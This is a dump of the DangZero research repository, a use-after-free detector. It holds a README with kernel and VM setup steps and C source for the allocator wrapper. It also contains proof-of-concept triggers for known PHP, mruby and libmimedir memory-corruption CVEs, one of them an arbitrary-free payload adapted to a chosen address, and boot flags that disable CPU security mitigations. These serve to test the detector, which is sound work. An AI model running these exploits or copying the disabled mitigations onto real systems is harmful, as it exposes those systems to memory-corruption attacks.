├── README.md ├── cves ├── libmimedir0.5.1-cve2015-3205 │ └── notes.txt ├── mruby-issue3515 │ ├── poc.rb │ └── run.sh ├── php5.4.44-cve2015-6835 │ ├── disable_custom_allocator.patch │ ├── poc.php │ └── run.sh ├── php5.5.14-cve2015-2787 │ ├── disable_custom_allocator.patch │ ├── poc.php │ └── run.sh ├── php7.0.7-cve2016-5773 │ ├── disable_custom_allocator.patch │ ├── poc.php │ └── run.sh └── python2.7.10-issue24613 │ └── notes.txt ├── dz.c ├── dz.h ├── gc.c ├── gc.h ├── hello.c ├── kml-image ├── Dockerfile └── build_kml.sh ├── kmod ├── Makefile └── dangmod.c ├── patchglibc.diff ├── queue.h └── test.sh /README.md: -------------------------------------------------------------------------------- 1 | # DangZero 2 | 3 | This repository contains the source code for the CCS'22 paper "DangZero: Efficient Use-After-Free Detection via Direct Page Table Access" by Floris Gorter, Koen Koning, Herbert Bos and Cristiano Giuffrida. 4 | The paper is available for download [here](https://download.vusec.net/papers/dangzero_ccs22.pdf). 5 | 6 | ## Building & Running 7 | ### Compile the KML kernel 8 | NOTE: (docker container takes about 25 GB disk space) 9 | ```shell 10 | cd kml-image 11 | bash build_kml.sh 12 | ``` 13 | 14 | ### Obtain Ubuntu 20.04 15 | ```shell 16 | cd ../ 17 | wget https://releases.ubuntu.com/20.04/ubuntu-20.04.5-desktop-amd64.iso 18 | ``` 19 | 20 | ### Create VM 21 | ```shell 22 | qemu-img create -f qcow2 ubuntu.img 60G 23 | ``` 24 | 25 | ### Install Ubuntu 26 | NOTE: these commands assume username 'u16' 27 | ```shell 28 | qemu-system-x86_64 -cdrom ubuntu-20.04.4-desktop-amd64.iso -drive "file=ubuntu.img,format=qcow2" -enable-kvm -m 16G -smp 16 29 | ``` 30 | 31 | ### Run Ubuntu 32 | ```shell 33 | qemu-system-x86_64 -drive "file=ubuntu.img,format=qcow2" -enable-kvm -m 16G -smp 16 -cpu host -net nic -net user,hostfwd=tcp::1810-:22 34 | ``` 35 | 36 | ### Move KML kernel to VM 37 | On the Guest (VM): 38 | ```shell 39 | apt-get install openssh-server 40 | ``` 41 | On the Host: 42 | ``` 43 | scp -P 1810 kml-image/linux-*.deb u16@localhost:~/ 44 | ``` 45 | ### Inside VM: Install Kernel 46 | ```shell 47 | cd ~/ 48 | sudo dpkg -i linux-*.deb 49 | ``` 50 | 51 | ### Update grub to auto-select KML kernel 52 | When not using a GUI for the VM, edit `/etc/default/grub`: 53 | ``` 54 | GRUB_DEFAULT="1>4" # depends on menu entries of grub 55 | #GRUB_TIMEOUT_STYLE=hidden # comment out 56 | GRUB_TIMEOUT=2 # if you want to see menu entries with GUI 57 | ``` 58 | 59 | ### Boot parameters 60 | Some systems may require the following boot param for booting KML (for GUI/tty). 61 | edit `/etc/default/grub`: 62 | ``` 63 | GRUB_CMDLINE_LINUX_DEFAULT="vga=normal" 64 | # Add console=ttyS0 if you want to run without GUI 65 | GRUB_CMDLINE_LINUX_DEFAULT="console=ttyS0 vga=normal" 66 | # Add make-linux-fast-again for performance: 67 | GRUB_CMDLINE_LINUX_DEFAULT="console=ttyS0 vga=normal noibrs noibpb nopti nospectre_v2 nospectre_v1 l1tf=off nospec_store_bypass_disable no_stf_barrier mds=off tsx=on tsx_async_abort=off mitigations=off" 68 | ``` 69 | 70 | ### Run KML 71 | Suggested flags for `-cpu host`: at least `-pdpe1gb` (for DangZero performance), `-avx,-f16c,-avx512f` in case the kernel crashes on boot, e.g.: 72 | ```shell 73 | qemu-system-x86_64 -drive "file=ubuntu.img,format=qcow2" -enable-kvm -m 8G -smp 16 -cpu host,-avx,-f16c,-avx512f,-pdpe1gb -nographic -serial mon:stdio -net nic -net user,hostfwd=tcp::1810-:22 74 | ``` 75 | 76 | ### Test KML 77 | Create the /`trusted` directory (may need sudo). 78 | Create an example `test.c` file: 79 | ```c 80 | #include 81 | #include 82 | void main(){ 83 | uint64_t cs = 0; 84 | int ring; 85 | asm("mov %%cs, %0" : "=r" (cs)); 86 | ring = (int)(cs&3); 87 | printf("running in ring %d\n", ring); 88 | } 89 | ``` 90 | Run the program inside `/trusted` and outside. Expected output: 91 | ```shell 92 | $ gcc test.c -o test 93 | $ /trusted/test 94 | running in ring 0 95 | $ /home/u16/test 96 | running in ring 3 97 | ``` 98 | 99 | ### Obtain glibc-2.31 100 | ```shell 101 | cd /trusted/ 102 | mkdir glibc 103 | cd glibc 104 | wget https://ftp.gnu.org/gnu/glibc/glibc-2.31.tar.gz 105 | tar -xf glibc-2.31.tar.gz 106 | ``` 107 | 108 | Move the glibc patch to the VM: 109 | ```shell 110 | scp -P 1810 patchglibc.diff u16@localhost:/trusted/glibc/glibc-2.31/ 111 | ``` 112 | 113 | ```shell 114 | cd /trusted/glibc/glibc-2.31 115 | patch -i patchglibc.diff -p 1 116 | mkdir build 117 | cd build 118 | sudo apt-get install bison gawk -y 119 | ../configure --prefix=/trusted/glibc/ 120 | make -j `nproc` 121 | make install 122 | ``` 123 | 124 | ### Install gcc-5 for kernel module 125 | The KML kernel requires an old gcc version for compatibility with the kernel module. 126 | ```shell 127 | echo -e "deb http://dk.archive.ubuntu.com/ubuntu/ xenial main\ndeb http://dk.archive.ubuntu.com/ubuntu/ xenial universe" | sudo tee -a /etc/apt/sources.list 128 | sudo apt-get update 129 | sudo apt install gcc-5 130 | sudo update-alternatives --install /usr/bin/gcc gcc /usr/bin/gcc-5 50 131 | sudo update-alternatives --install /usr/bin/gcc gcc /usr/bin/gcc-9 90 132 | sudo update-alternatives --config gcc 133 | # select gcc-5 134 | ``` 135 | 136 | ### Install the kernel module 137 | ```shell 138 | cd kmod 139 | make 140 | sudo insmod dangmod.ko 141 | ``` 142 | 143 | ### Test DangZero 144 | Make sure to select `gcc-9` again as primary gcc 145 | Make sure the DangZero git files also exist in the VM (e.g., `dz.c`) 146 | ```shell 147 | bash test.sh 148 | ``` 149 | -------------------------------------------------------------------------------- /cves/libmimedir0.5.1-cve2015-3205/notes.txt: -------------------------------------------------------------------------------- 1 | https://packetstormsecurity.com/files/132257/Libmimedir-VCF-Memory-Corruption-Proof-Of-Concept.html 2 | # this exploit is an arbitrary free, meaning you can control the address that is freed() 3 | # download: https://sourceforge.net/projects/libmimedir/files/latest/download 4 | # this is libmimedir 0.5.1 5 | ./configure 6 | make 7 | sudo make install 8 | # installs in /usr/local/lib/ 9 | # I moved it into /usr/local/lib/libmimedir/ 10 | # input: create the python script from link which creates free.vcf 11 | # Compile: (can add -fsanitize=address) 12 | # C file: 13 | 14 | #include 15 | #include "libmimedir.h" 16 | #include 17 | #include 18 | 19 | int main(int argc, char** argv) 20 | { 21 | // sleep(10); // gdb attach time 22 | char *num = argv[1]; 23 | char file[256]; 24 | strcpy(file, "free"); 25 | strcat(file, num); 26 | strcat(file, ".vcf"); 27 | printf("target file = %s\n", file); 28 | 29 | mdir_line** l = mdir_parse_file(file); 30 | printf("result=%p\n", l); 31 | return 0; 32 | } 33 | 34 | 35 | # Change DangZero: there is a dependency on which characters are allowed in the input, and 36 | # DangZero's default base address contains too many zeroes to trigger a free() on them 37 | # SHADOW_BASE = 0xffff964242400000 38 | # Then update the last_pt ptrs accordingly: L4 300 L3 265 L2 18 L1 0 39 | # Dump all the calls to malloc made by the program (resulting alias memory addresses). 40 | # Pick one around the end, for example: 0xffff964242439bb8 41 | # Update the Python POC to write 0xffff964242439bb8 instead of 0x4141414141414141 42 | 43 | def single(n): 44 | mime = "begin:vcardp 46 | mime += pack(" {} rescue 4 | Struct.new.new.to_h 5 | end 6 | end 7 | -------------------------------------------------------------------------------- /cves/mruby-issue3515/run.sh: -------------------------------------------------------------------------------- 1 | [ -d mruby ] || \ 2 | git clone https://github.com/mruby/mruby.git 3 | 4 | cd mruby 5 | git checkout -q 191ee25 6 | 7 | [ -f bin/mruby ] || 8 | rake 9 | 10 | echo [+] Running mruby poc.rb ... 11 | bin/mruby ../poc.rb 12 | -------------------------------------------------------------------------------- /cves/php5.4.44-cve2015-6835/disable_custom_allocator.patch: -------------------------------------------------------------------------------- 1 | --- php-5.4.44/Zend/zend_alloc.c 2015-08-05 06:34:37.000000000 +0200 2 | +++ php-5.4.44-sysalloc/Zend/zend_alloc.c 2022-06-22 10:49:12.787493736 +0200 3 | @@ -2419,6 +2419,8 @@ 4 | { 5 | TSRMLS_FETCH(); 6 | 7 | + return malloc(size); 8 | + 9 | if (UNEXPECTED(!AG(mm_heap)->use_zend_alloc)) { 10 | return AG(mm_heap)->_malloc(size); 11 | } 12 | @@ -2429,6 +2431,9 @@ 13 | { 14 | TSRMLS_FETCH(); 15 | 16 | + free(ptr); 17 | + return; 18 | + 19 | if (UNEXPECTED(!AG(mm_heap)->use_zend_alloc)) { 20 | AG(mm_heap)->_free(ptr); 21 | return; 22 | @@ -2440,6 +2445,8 @@ 23 | { 24 | TSRMLS_FETCH(); 25 | 26 | + return realloc(ptr, size); 27 | + 28 | if (UNEXPECTED(!AG(mm_heap)->use_zend_alloc)) { 29 | return AG(mm_heap)->_realloc(ptr, size); 30 | } 31 | -------------------------------------------------------------------------------- /cves/php5.4.44-cve2015-6835/poc.php: -------------------------------------------------------------------------------- 1 | ../poc-out.txt 18 | 19 | if grep hi ../poc-out.txt >/dev/null; then echo "++++VULNERABLE++++"; else echo "not vulnerable"; fi 20 | 21 | -------------------------------------------------------------------------------- /cves/php5.5.14-cve2015-2787/disable_custom_allocator.patch: -------------------------------------------------------------------------------- 1 | --- php-5.4.44/Zend/zend_alloc.c 2015-08-05 06:34:37.000000000 +0200 2 | +++ php-5.4.44-sysalloc/Zend/zend_alloc.c 2022-06-22 10:49:12.787493736 +0200 3 | @@ -2419,6 +2419,8 @@ 4 | { 5 | TSRMLS_FETCH(); 6 | 7 | + return malloc(size); 8 | + 9 | if (UNEXPECTED(!AG(mm_heap)->use_zend_alloc)) { 10 | return AG(mm_heap)->_malloc(size); 11 | } 12 | @@ -2429,6 +2431,9 @@ 13 | { 14 | TSRMLS_FETCH(); 15 | 16 | + free(ptr); 17 | + return; 18 | + 19 | if (UNEXPECTED(!AG(mm_heap)->use_zend_alloc)) { 20 | AG(mm_heap)->_free(ptr); 21 | return; 22 | @@ -2440,6 +2445,8 @@ 23 | { 24 | TSRMLS_FETCH(); 25 | 26 | + return realloc(ptr, size); 27 | + 28 | if (UNEXPECTED(!AG(mm_heap)->use_zend_alloc)) { 29 | return AG(mm_heap)->_realloc(ptr, size); 30 | } 31 | -------------------------------------------------------------------------------- /cves/php5.5.14-cve2015-2787/poc.php: -------------------------------------------------------------------------------- 1 | name); 7 | } 8 | } 9 | 10 | $data = unserialize('a:2:{i:0;O:9:"evilClass":1:{s:4:"name";a:2:{i:0;i:1;i:1;i:2;}}i:1;R:4;}'); 11 | 12 | for($i = 0; $i < 5; $i++) { 13 | $v[$i] = "hi" . $i; 14 | } 15 | 16 | var_dump($data); 17 | -------------------------------------------------------------------------------- /cves/php5.5.14-cve2015-2787/run.sh: -------------------------------------------------------------------------------- 1 | set -eu 2 | 3 | [ -f php-5.5.14.tar.gz ] || \ 4 | wget "https://www.php.net/distributions/php-5.5.14.tar.gz" 5 | [ -d php-5.5.14.tar.gz ] || \ 6 | tar xf php-5.5.14.tar.gz 7 | 8 | cd php-5.5.14 9 | patch -p1 -s < ../disable_custom_allocator.patch 10 | 11 | [ -f Makefile ] || \ 12 | ./configure 13 | [ -f sapi/cli/php ] || \ 14 | make -j`nproc` 15 | 16 | # Execute the actual poc (add LD_PRELOAD here) 17 | sapi/cli/php -f ../poc.php > ../poc-out.txt 18 | 19 | if grep hi ../poc-out.txt >/dev/null; then echo "++++VULNERABLE++++"; else echo "not vulnerable"; fi 20 | 21 | -------------------------------------------------------------------------------- /cves/php7.0.7-cve2016-5773/disable_custom_allocator.patch: -------------------------------------------------------------------------------- 1 | --- php-7.0.7/Zend/zend_alloc.c 2016-05-25 15:13:18.000000000 +0200 2 | +++ php-7.0.7-sysalloc/Zend/zend_alloc.c 2022-06-22 12:47:41.136531039 +0200 3 | @@ -2332,7 +2332,7 @@ 4 | #endif 5 | } 6 | 7 | -#if !ZEND_DEBUG && (!defined(_WIN32) || defined(__clang__)) 8 | +#if 0 && !ZEND_DEBUG && (!defined(_WIN32) || defined(__clang__)) 9 | #undef _emalloc 10 | 11 | #if ZEND_MM_CUSTOM 12 | @@ -2437,6 +2437,7 @@ 13 | 14 | ZEND_API void* ZEND_FASTCALL _emalloc(size_t size ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC) 15 | { 16 | + return malloc(size); 17 | 18 | #if ZEND_MM_CUSTOM 19 | if (UNEXPECTED(AG(mm_heap)->use_custom_heap)) { 20 | @@ -2452,6 +2453,8 @@ 21 | 22 | ZEND_API void ZEND_FASTCALL _efree(void *ptr ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC) 23 | { 24 | + free(ptr); 25 | + return; 26 | 27 | #if ZEND_MM_CUSTOM 28 | if (UNEXPECTED(AG(mm_heap)->use_custom_heap)) { 29 | @@ -2468,6 +2471,7 @@ 30 | 31 | ZEND_API void* ZEND_FASTCALL _erealloc(void *ptr, size_t size ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC) 32 | { 33 | + return realloc(ptr, size); 34 | 35 | if (UNEXPECTED(AG(mm_heap)->use_custom_heap)) { 36 | if (ZEND_DEBUG && AG(mm_heap)->use_custom_heap == ZEND_MM_CUSTOM_HEAP_DEBUG) { 37 | @@ -2481,6 +2485,7 @@ 38 | 39 | ZEND_API void* ZEND_FASTCALL _erealloc2(void *ptr, size_t size, size_t copy_size ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC) 40 | { 41 | + return realloc(ptr, size); 42 | 43 | if (UNEXPECTED(AG(mm_heap)->use_custom_heap)) { 44 | if (ZEND_DEBUG && AG(mm_heap)->use_custom_heap == ZEND_MM_CUSTOM_HEAP_DEBUG) { 45 | --- php-7.0.7/Zend/zend_alloc.h 2016-05-25 15:13:18.000000000 +0200 46 | +++ php-7.0.7-sysalloc/Zend/zend_alloc.h 2022-06-22 12:46:29.785697807 +0200 47 | @@ -88,7 +88,7 @@ 48 | #include "zend_alloc_sizes.h" 49 | 50 | /* _emalloc() & _efree() specialization */ 51 | -#if !ZEND_DEBUG && defined(HAVE_BUILTIN_CONSTANT_P) 52 | +#if 0 && !ZEND_DEBUG && defined(HAVE_BUILTIN_CONSTANT_P) 53 | 54 | # define _ZEND_BIN_ALLOCATOR_DEF(_num, _size, _elements, _pages, x, y) \ 55 | ZEND_API void* ZEND_FASTCALL _emalloc_ ## _size(void) ZEND_ATTRIBUTE_MALLOC; 56 | -------------------------------------------------------------------------------- /cves/php7.0.7-cve2016-5773/poc.php: -------------------------------------------------------------------------------- 1 | rc is 0 10 | $a = $unserialized_payload[1]; 11 | // Increment the reference counter by 1 again -> rc is 1 12 | $b = $a; 13 | // Trigger free of $free_me (referenced by $m[1]). 14 | unset($b); 15 | $fill_freed_space_1 = "filler_zval_1"; 16 | $fill_freed_space_2 = "filler_zval_2"; 17 | $fill_freed_space_3 = "filler_zval_3"; 18 | $fill_freed_space_4 = "filler_zval_4"; 19 | debug_zval_dump($unserialized_payload[1]); 20 | -------------------------------------------------------------------------------- /cves/php7.0.7-cve2016-5773/run.sh: -------------------------------------------------------------------------------- 1 | set -eu 2 | 3 | [ -f php-7.0.7.tar.gz ] || \ 4 | wget "https://www.php.net/distributions/php-7.0.7.tar.gz" 5 | [ -d php-7.0.7.tar.gz ] || \ 6 | tar xf php-7.0.7.tar.gz 7 | 8 | cd php-7.0.7 9 | patch -p1 -s < ../disable_custom_allocator.patch 10 | 11 | [ -f Makefile ] || \ 12 | ./configure --enable-zip 13 | [ -f sapi/cli/php ] || \ 14 | make -j`nproc` 15 | 16 | # Execute the actual poc (add LD_PRELOAD here) 17 | sapi/cli/php -f ../poc.php > ../poc-out.txt 18 | 19 | if ! grep 'object(stdClass)#3 (0) refcount(1){' ../poc-out.txt >/dev/null; then echo "++++VULNERABLE++++"; else echo "not vulnerable"; fi 20 | 21 | -------------------------------------------------------------------------------- /cves/python2.7.10-issue24613/notes.txt: -------------------------------------------------------------------------------- 1 | https://bugs.python.org/issue24613 2 | # move to /trusted: 3 | curl --create-dirs -L -o src/Python-2.7.10.tgz https://www.python.org/ftp/python/2.7.10/Python-2.7.10.tgz 4 | cd src 5 | tar -zxf Python-2.7.10.tgz 6 | cd Python-2.7.10 7 | ./configure 8 | make 9 | export DESTDIR="`pwd`/installation" 10 | make install 11 | cd installation/usr/local/bin 12 | touch poc.py 13 | # create the poc.py 14 | LD_PRELOAD=/trusted/wrap.so ./python2.7 poc.py 15 | -------------------------------------------------------------------------------- /dz.c: -------------------------------------------------------------------------------- 1 | #define _GNU_SOURCE // for non-POSIX RTLD_NEXT 2 | #include // dlsym 3 | #include 4 | #include 5 | #include 6 | #include // malloc_usable_size 7 | #include // pid_t 8 | #include // sleep 9 | #include // strtoul 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | //#include 17 | //#include 18 | 19 | #include "queue.h" 20 | #include "dz.h" 21 | #include "gc.h" 22 | 23 | 24 | //#define __SPEC_MODE 25 | //#define __NGINX_MODE 26 | //#define __JULIET_MODE 27 | #define __CVE_MODE 28 | 29 | #ifdef __CVE_MODE 30 | #include 31 | #endif 32 | 33 | #ifdef __TRACK_MEM_USAGE 34 | #include 35 | uint64_t max_pt_count = 0; 36 | uint64_t curr_pt_count = 0; 37 | #endif 38 | 39 | //gcc -fPIC -shared -pthread -O2 -o wrap.so dz.c gc.c -ldl 40 | 41 | static uint8_t process = 0; 42 | uintptr_t* g_cr3 = NULL; 43 | 44 | #define _last_pdpt last_pdpt 45 | #define _last_pde last_pde 46 | #define _last_pte last_pte 47 | #define _last_pml4_index last_pml4_index 48 | #define _last_pdpt_index last_pdpt_index 49 | #define _last_pde_index last_pde_index 50 | #define _last_pte_index last_pte_index 51 | 52 | struct span { 53 | uintptr_t start; 54 | uintptr_t end; 55 | }; 56 | // initial main span 57 | static struct span free_span; 58 | 59 | // page walk optimization 60 | uintptr_t *last_pdpt, *last_pde, *last_pte; 61 | unsigned short last_pml4_index = PML4_SHADOW_START; 62 | unsigned short last_pdpt_index = 0; 63 | unsigned short last_pde_index = 0; 64 | unsigned short last_pte_index = USHRT_MAX; // overflow into 0 65 | 66 | typedef int (*proto_posix_memalign)(void **memptr, size_t alignment, size_t size); 67 | proto_posix_memalign __posix_memalign; 68 | 69 | struct map_pa_va { 70 | uintptr_t pa; 71 | uintptr_t va; 72 | }; 73 | 74 | struct _fork_sync { 75 | pthread_mutex_t mutex; 76 | pthread_cond_t cond; 77 | int copy_done; 78 | }; 79 | 80 | struct _fork_sync* fork_sync; 81 | pthread_mutexattr_t fork_mutex_attr; 82 | pthread_condattr_t fork_cond_attr; 83 | 84 | proto_get_zeroed_page get_zeroed_page = (proto_get_zeroed_page) SYMBOL_ADDR_get_zeroed_page; 85 | proto_free_pages free_pages = (proto_free_pages) SYMBOL_ADDR_free_pages; 86 | proto___get_free_pages __get_free_pages = (proto___get_free_pages) SYMBOL_ADDR___get_free_pages; 87 | proto_kfree kfree = (proto_kfree) SYMBOL_ADDR_kfree; 88 | proto_kmalloc kmalloc = (proto_kmalloc) SYMBOL_ADDR_kmalloc; 89 | proto_kallsyms_lookup_name kallsyms_lookup_name = (proto_kallsyms_lookup_name) SYMBOL_ADDR_kallsyms_lookup_name; 90 | 91 | #ifdef __GC 92 | // fork + destructor: highest_shadow 93 | #ifdef __GC_WATERMARK 94 | uint64_t invalidated_pages = 0; 95 | #endif 96 | uint64_t highest_shadow = 0; 97 | bool fragmented = false; 98 | struct vp_span* cur_span = NULL; 99 | 100 | // free list stuff 101 | static inline size_t span_num_pages(struct vp_span *span) 102 | { 103 | return (span->end - span->start) / PGSIZE; 104 | } 105 | 106 | static inline bool span_empty(struct vp_span *span) 107 | { 108 | return span->start == span->end; 109 | } 110 | 111 | #define VP_FREELIST_INIT(PTR) { \ 112 | .items = LIST_HEAD_INITIALIZER(&(PTR)->items), \ 113 | } 114 | 115 | // bucketing 116 | //struct vp_freelist* g_freelist = NULL; 117 | uint64_t bucket_size = 0; 118 | //unsigned curr_bucket = 0; 119 | 120 | // new freelist management 121 | struct vp_freelist* opt_freelist = NULL; //VP_FREELIST_INIT(&opt_freelist); 122 | struct vp_span** sub_spans = NULL; 123 | 124 | static uint64_t shadow_pages_in_use() 125 | { 126 | uint64_t total = 0; 127 | struct vp_span *span; 128 | 129 | if(opt_freelist != NULL && opt_freelist->items.lh_first != NULL){ 130 | LIST_FOREACH(span, &(opt_freelist->items), freelist){ 131 | total += span_num_pages(span); 132 | } 133 | } 134 | 135 | uint64_t base = ((uint64_t)SHADOW_END-SHADOW_BASE) / PAGE_SIZE; // num pages 136 | 137 | return base - total; 138 | } 139 | 140 | static void update_span_last_ptrs(struct vp_span* span) 141 | { 142 | // page walk the span->start for last_ptrs 143 | uint64_t start = span->start; 144 | last_pml4_index = PML4_INDEX(start); 145 | last_pdpt = step_shadow_table(g_cr3, last_pml4_index); 146 | last_pdpt_index = PDPT_INDEX(start); 147 | last_pde = step_shadow_table(last_pdpt, last_pdpt_index); 148 | last_pde_index = PDE_INDEX(start); 149 | #ifdef __GC_PT_COMPRESS 150 | last_pte = step_shadow_table_L2cpt(last_pde, last_pde_index); 151 | #else 152 | last_pte = step_shadow_table(last_pde, last_pde_index); 153 | #endif 154 | last_pte_index = (unsigned short)(PTE_INDEX(start)-1); // alloc does ++ 155 | span->last_sync = true; 156 | } 157 | 158 | struct vp_span *try_merge_spans(struct vp_span *left, struct vp_span *right) 159 | { 160 | if (left->end != right->start) 161 | return NULL; 162 | 163 | LOG("merging span %p (%p - %p) with span %p (%p - %p)\n", 164 | left, (void *)left->start, (void *)left->end, 165 | right, (void *)right->start, (void *)right->end); 166 | 167 | // merge 'right' into 'left' 168 | left->end = right->end; 169 | LIST_REMOVE(right, freelist); 170 | 171 | // fcg: removed spans need to get zeroed out to not cause GC marking 172 | // alternatively, we can use kmalloc+kfree, but may be slower 173 | #ifdef WM_ZERO 174 | right->start = 0; right->end = 0; 175 | #endif 176 | WM_FREE(right); 177 | 178 | return left; 179 | } 180 | 181 | int freelist_free(struct vp_freelist *list, void *p, size_t npages) 182 | { 183 | // ASSERT0((vaddr_t)p % PGSIZE == 0); 184 | // ASSERT0(npages > 0); 185 | 186 | vaddr_t start = (vaddr_t)p; 187 | vaddr_t end = PG_OFFSET(start, npages); 188 | 189 | // find the two spans between which the new span would go 190 | struct vp_span *prev_span = NULL, *next_span; 191 | LIST_FOREACH(next_span, &list->items, freelist) { 192 | if (next_span->start >= end) 193 | break; 194 | 195 | prev_span = next_span; 196 | } 197 | 198 | // try merging with prev_span 199 | if (prev_span != NULL && prev_span->end == start) { 200 | // LOG("merging freed range %p - %p into prev span %p (%p - %p)\n", 201 | // (void *)start, (void *)end, prev_span, (void *)prev_span->start, 202 | // (void *)prev_span->end); 203 | 204 | prev_span->end = end; 205 | 206 | // try merging prev_span with next_span 207 | if (next_span != LIST_END(&list->items)) 208 | try_merge_spans(prev_span, next_span); 209 | 210 | return 0; 211 | } 212 | 213 | // try merging with next_span 214 | if (next_span != LIST_END(&list->items) && next_span->start == end) { 215 | LOG("merging freed range %p - %p into next span %p (%p - %p)\n", 216 | (void *)start, (void *)end, next_span, (void *)next_span->start, 217 | (void *)next_span->end); 218 | 219 | next_span->start = start; 220 | // lazy assign last_ptrs 221 | next_span->last_sync = false; 222 | 223 | // try merging prev_span with next_span 224 | if (prev_span) 225 | try_merge_spans(prev_span, next_span); 226 | 227 | return 0; 228 | } 229 | 230 | // failed to merge into existing spans, so we'll have to create a new span 231 | struct vp_span *span = WM_ALLOC(sizeof(struct vp_span)); 232 | if (UNLIKELY(!span)) { 233 | LOG("could not allocate vp_span: out of memory?\n"); 234 | return -1; 235 | } 236 | 237 | span->start = start; 238 | span->end = end; 239 | // lazy assign last_ptrs 240 | span->last_sync = false; 241 | 242 | LOG("new span %p: %p - %p (%zu pages)\n", span, (void *)span->start, (void *)span->end, span_num_pages(span)); 243 | 244 | // insert the new span 245 | if (prev_span) { 246 | LIST_INSERT_AFTER(prev_span, span, freelist); 247 | } else if (next_span != LIST_END(&list->items)) { 248 | LIST_INSERT_BEFORE(next_span, span, freelist); 249 | } else { 250 | LIST_INSERT_HEAD(&list->items, span, freelist); 251 | } 252 | 253 | return 0; 254 | } 255 | 256 | static void freelist_reset(struct vp_freelist *list) 257 | { 258 | struct vp_span *span, *tmp; 259 | LIST_FOREACH_SAFE(span, &list->items, freelist, tmp) { 260 | LIST_REMOVE(span, freelist); 261 | #ifdef WM_ZERO 262 | span->start = 0; span->end = 0; 263 | #endif 264 | WM_FREE(span); 265 | } 266 | } 267 | #endif // GC 268 | 269 | static uint64_t shadow_page_size() 270 | { 271 | // size of the shadow space, i.e., 272 | // how much is currently unavailable for re-use 273 | uint64_t size = 0; 274 | #ifdef __GC 275 | if(highest_shadow != 0){ 276 | // freelist_size is in number of pages 277 | //size = ((highest_shadow - SHADOW_BASE) / PAGE_SIZE) - freelist_size(); 278 | size = shadow_pages_in_use(); 279 | } 280 | #else 281 | size = ((free_span.start - SHADOW_BASE) / PAGE_SIZE); 282 | #endif 283 | return size; 284 | } 285 | 286 | #ifdef __TRACK_SHADOW_SIZE 287 | FILE* shw_fp = NULL; 288 | uint64_t nallocs = 0; 289 | unsigned out_cnt = 0; 290 | 291 | void output_shadow_size(bool gc) 292 | { 293 | process=0; 294 | if(shw_fp == NULL){ 295 | pid_t pid = getpid(); 296 | char piddy[6]; 297 | sprintf(piddy, "%d", pid); 298 | 299 | char path[256]; 300 | strcpy(path, "/home/u16/Documents/shadowlog_"); 301 | strcat(path, piddy); 302 | 303 | shw_fp = fopen(path, "w"); 304 | if(shw_fp == NULL){ 305 | process=1; 306 | return; 307 | } 308 | } 309 | uint64_t shadow_sz = shadow_page_size(); 310 | // __TRACK_MEM_USAGE 311 | uint64_t total_rss_pages = 0; 312 | 313 | long rss = 0L; 314 | FILE* fp = NULL; 315 | if ( (fp = fopen( "/proc/self/statm", "r" )) == NULL ){ 316 | process=1; 317 | return; /* Can't open? */ 318 | } 319 | if ( fscanf( fp, "%*s%ld", &rss ) != 1 ) 320 | { 321 | fclose( fp ); 322 | process=1; 323 | return; /* Can't read? */ 324 | } 325 | fclose( fp ); 326 | total_rss_pages = (size_t)rss; 327 | //total_rss_pages += curr_pt_count; 328 | 329 | if(gc){ 330 | #ifdef __NGINX_MODE 331 | //pid_t pid = getpid(); 332 | fprintf(shw_fp, "%u %lu %lu -- %lu %lu (gc)\n", out_cnt, nallocs, shadow_sz, total_rss_pages, curr_pt_count); 333 | #else 334 | fprintf(shw_fp, "%u %lu %lu (gc)\n", out_cnt, nallocs, shadow_sz); 335 | #endif 336 | //fprintf(shw_fp, "cpt list size %lu (gc)\n", out_cpt_list_size()); 337 | } 338 | else{ 339 | #ifdef __NGINX_MODE 340 | //pid_t pid = getpid(); 341 | fprintf(shw_fp, "%u %lu %lu -- %lu %lu\n", out_cnt, nallocs, shadow_sz, total_rss_pages, curr_pt_count); 342 | #else 343 | fprintf(shw_fp, "%u %lu %lu\n", out_cnt, nallocs, shadow_sz); 344 | #endif 345 | //fprintf(shw_fp, "cpt list size %lu\n", out_cpt_list_size()); 346 | } 347 | 348 | out_cnt++; 349 | process=1; 350 | } 351 | #endif 352 | 353 | // ---------------------- // 354 | 355 | uintptr_t* create_page_table(uintptr_t* table, unsigned short entry) 356 | { 357 | // get a kernel memory page for the new table 358 | // uintptr_t kpage = get_zeroed_page(GFP_NOWAIT); // GFP_NOWAIT 359 | 360 | uintptr_t kpage = __get_free_pages(GFP_NOWAIT, 0); 361 | memset((void*)kpage, 0, PAGE_SIZE); 362 | 363 | #ifdef __TRACK_MEM_USAGE 364 | curr_pt_count++; 365 | if(curr_pt_count > max_pt_count){ 366 | max_pt_count = curr_pt_count; 367 | } 368 | #endif 369 | 370 | // connect the previous table with the next table 371 | #ifdef __GC 372 | *(table + entry) = virt_to_phys((void*)kpage) | PAGE_PRESENT | PAGE_WRITABLE | PTE_ALIASSES; 373 | #else 374 | *(table + entry) = virt_to_phys((void*)kpage) | PAGE_PRESENT | PAGE_WRITABLE; 375 | #endif 376 | // new page in new address space, no flush TLB 377 | 378 | // return virt addr of table 379 | return (uintptr_t*)kpage; 380 | } 381 | 382 | static uintptr_t* get_table_page(uintptr_t* table, unsigned short index) 383 | { 384 | uintptr_t page = *(table+index); 385 | if(!(page & PAGE_PRESENT)) 386 | return NULL; 387 | 388 | // PAGE_FRAME to remove flag bits 389 | // PAGE_OFFSET to return kernel-space virtual address 390 | // note: make sure this cast wraps the entire result (lol) 391 | return (uintptr_t*)((page & PAGE_FRAME) + PAGE_OFFSET); 392 | } 393 | 394 | static uintptr_t* get_table_page_L2cpt(uintptr_t* table, unsigned short index, bool *cpt) 395 | { 396 | // this assumes table == L2 (PD) 397 | uintptr_t page = *(table+index); 398 | if(page & PAGE_PRESENT){ 399 | *cpt = false; 400 | return (uintptr_t*)((page & PAGE_FRAME) + PAGE_OFFSET); 401 | } 402 | else if(page & PTE_COMPRESSED){ 403 | if(!(page & PTE_CMS_ONEBIG) && !(page & PTE_CMS_ALLSMALL)){ 404 | *cpt = true; 405 | return (uintptr_t*)((page & PTE_FRAME_CPT) + PAGE_OFFSET); 406 | } 407 | } 408 | 409 | *cpt = false; 410 | return NULL; 411 | } 412 | 413 | static uintptr_t* get_table_page_nocheck(uintptr_t* table, unsigned short index) 414 | { 415 | // here we assume the page is present... (nocheck) 416 | return (uintptr_t*)((*(table+index) & PAGE_FRAME) + PAGE_OFFSET); 